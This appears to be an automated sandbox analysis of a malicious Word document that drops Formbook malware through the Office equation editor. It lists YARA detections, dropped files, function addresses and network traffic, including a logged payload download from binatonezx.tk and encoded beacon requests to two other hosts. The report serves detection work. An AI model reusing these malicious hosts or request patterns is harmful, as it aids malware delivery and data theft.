          Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.452985686.0000000007159000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: explorer.exe, 00000006.00000000.506295914.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.506295914.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.437737820.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.437737820.00000000002C7000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.442147591.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.451281002.0000000004513000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.506586274.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: raserver.exe, 00000007.00000002.680534004.0000000002B5F000.00000004.00020000.sdmpString found in binary or memory: https://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3AC3AA43-F534-4DDB-AF6A-E52603844969}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: binatonezx.tk
          Source: global trafficHTTP traffic detected: GET /villarzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj HTTP/1.1Host: www.filecrev.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj HTTP/1.1Host: www.charlotte-s-creations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\villar8681.exeJump to dropped file
          Source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D0190
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D6AF8
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D67C0
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D8887
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D0561
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D8638
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D8648
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002D67AF
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_010494B4
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041E840
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041E066
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041D950
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041E1DE
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041DAF8
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041E292
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041EC35
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00402D87
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041D596
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00409E50
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00409E54
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041DE95
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087E0C6
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008AD005
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00883040
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0089905A
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008FD06D
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090D13F
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087E2E9
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00921238
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_009263BF
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087F3CF
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008A63DB
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00882305
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00887353
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008CA37B
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00891489
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008B5485
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090443E
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008BD47D
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_009235DA
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_009005E3
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0089C5F0
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0088351F
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008C6540
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00884680
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0088E6C1
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00922622
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008CA634
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090579A
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0088C7BC
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008B57C3
